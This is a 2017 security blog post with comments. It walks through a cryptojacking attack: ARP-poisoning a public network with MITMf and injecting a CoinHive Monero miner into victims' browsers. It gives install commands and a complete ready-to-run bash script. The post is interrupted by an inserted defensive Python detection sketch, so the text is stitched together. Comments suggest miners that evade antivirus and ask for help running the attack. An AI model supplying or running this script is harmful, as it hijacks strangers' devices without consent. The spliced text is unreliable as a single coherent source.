General, Info Sec 10-October-2017 .NetRussell 18 comments

Miner In the Middle


So not too long ago I read an article that TPB was running a JS miner in visitors’ browsers when they visit to generate some extra cash. I thought it was a pretty novel idea. Why not? I’d rather give up a little CPU power instead of looking at obnoxious ads.

Then I got to thinking… I wonder how hard it would be to inject a JavaScript miner into a public network.

A few weeks back I started playing around with MITMf (Man-In-The-Middle Framework). Originally my goal was to inject BeEF hooks and eventually get a shell. I realized, though, that this was a futile attempt these days, so I moved on. Then I saw this JavaScript payload that mines Monero for you and I got to thinking. It would be pretty easy to drop onto a public network, arpspoof everyone and inject a JavaScript miner into their browser. So I started working on the attack. I’m happy to say that I was able to prove this and here is a PoC 😀

tldr; here’s the script


Setting up The Attack:

Before you can launch your mining assault you need to first

  1. Get a Monero wallet
  2. Get a CoinHive account

Once you have your CoinHive account, navigate to settings and put your Monero wallet payout address into the site. That way they can pay you your funds 😀

You’ll also need to get an API key from the site. This is also under the settings page.

You’re also going to need to install MITMf and Twisted 15.5.0 if you’re running Kali. You can either install these by hand or you can run the script I built.

To install manually:

apt-get update;

apt-get install mitmf

pip install Twisted==15.5.0

How the Attack Works:

The attack is pretty simple actually. Your attacking machine needs to connect to a network with people surfing the web on it. Once connected, you run the script I provided above. The script will create an HTML file that has the JavaScript Monero miner in it and it will also link your API key into it. Once the file is built, it launches the MITMf application.

The MITMf application, once running, will first ARP-poison the network and tell everyone to route traffic through your machine. Next it will listen for HTTP responses. When it sees one, it will inject our payload into it. Finally the victim will execute the payload automatically, without prompt, and start mining Monero for you.

That’s it!

I attempted this attack on my home network and within about 30 seconds I had 3 machines and my girlfriend’s phone mining Monero for me lol

For the skeptics that are afraid to download the script, here’s the code. It’s pretty straightforward.
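From the defender's side, the ARP poisoning and HTTP response injection described above leave two observable traces: the gateway's IP resolving to a MAC that another host also uses (or that differs from a recorded baseline), and response bodies containing the `CoinHive.Anonymous(` constructor. The following detection sketch is an added example, not code from the original post; the IP addresses, MAC addresses, interface name, baseline MAC and function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample of `ip neigh show` output on a client during ARP poisoning:
# the gateway 192.168.1.1 resolves to the same MAC as host 192.168.1.50.
SAMPLE_NEIGH = """\
192.168.1.1 dev wlan0 lladdr 08:00:27:aa:bb:cc REACHABLE
192.168.1.50 dev wlan0 lladdr 08:00:27:aa:bb:cc STALE
192.168.1.23 dev wlan0 lladdr 3c:22:fb:10:20:30 REACHABLE
192.168.1.77 dev wlan0  FAILED
"""
# Constructed HTTP response body carrying the injected snippet (placeholder key).
SAMPLE_BODY = ("<html><body>news<script>var miner = new "
               "CoinHive.Anonymous('SITE_KEY_PLACEHOLDER');miner.start();"
               "</script></body></html>")

NEIGH_RE = re.compile(r"^(\S+) dev \S+ lladdr ([0-9a-f:]{17})\b", re.I)
MINER_RE = re.compile(r"CoinHive\.Anonymous\s*\(", re.I)

def parse_neigh(text):
    """Return {ip: mac} for neighbour entries that carry a link-layer address."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table

def arp_findings(table, gateway_ip, known_gateway_mac=None):
    """Flag a gateway MAC shared with another IP or differing from a baseline."""
    findings = []
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    gw_mac = table.get(gateway_ip)
    others = sorted(ip for ip in by_mac.get(gw_mac, []) if ip != gateway_ip)
    if others:
        findings.append(f"gateway {gateway_ip} shares MAC {gw_mac} with {', '.join(others)}")
    if known_gateway_mac and gw_mac and gw_mac != known_gateway_mac.lower():
        findings.append(f"gateway MAC is {gw_mac}, baseline is {known_gateway_mac.lower()}")
    return findings

def body_has_injected_miner(html):
    """True if a response body contains the miner constructor the page's payload uses."""
    return bool(MINER_RE.search(html))

if __name__ == "__main__":
    print(arp_findings(parse_neigh(SAMPLE_NEIGH), "192.168.1.1", "b4:fb:e4:00:11:22"))
    print("miner injected:", body_has_injected_miner(SAMPLE_BODY))
```

Since the injection described above acts on HTTP responses, the body check is meant for plaintext HTTP traffic seen by a proxy or sensor; the neighbour-table check runs on any client or monitoring host on the segment.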


if [ $# -eq “3” ]     then

apt-get update -y

apt-get install mitmf -y

pip install Twisted==15.5.0

echo “<script src=””></script><script>var miner = new      CoinHive.Anonymous(‘”$1″‘);miner.start();</script>” > /root/.miner_itm.html

mitmf –inject –html-file /root/.miner_itm.html –spoof –arp –gateway $2 -i $3


echo “./ <coinhive api key> <gateway ip> <interface name>”




Now obviously it is ILLEGAL to mine on someone’s machine without their express permission. Also, remember that mining reduces the shelf life of your hardware. Devices weren’t designed to run at 100% for days, weeks or months at a time. I just wanted to demo this fun little attack that I think we’ll see more of in the future.

If you have any questions or info on how to clean this up, please reach out to me on twitter


18 thoughts on “Miner In the Middle”

  1. Many search engines and antiviruses are blocking sites with coinhive code. Better to use alternatives, like Gridcash, for example.

  2. Good post! I also like to mine monero using a javascript miner, but i’m using which is the solution that i find to make really good profit on my websites with javascript mining, since it is not recognized by any antivirus as a malware or virus.

  3. can someone please help me out here?
    i’m trying to do the coinhive miner injection
    i’m running a persistent kali linux usb. the tutorial worked once but the next time it just didn’t work,
    i have zero ideas about coding and i’m a 100% script kiddy. can anyone post an easy and simple way to understand and follow through ? the errors i keep getting in MITMf are something related to attribute headers. a reply asap would be appreciated
    just a man trying to learn.
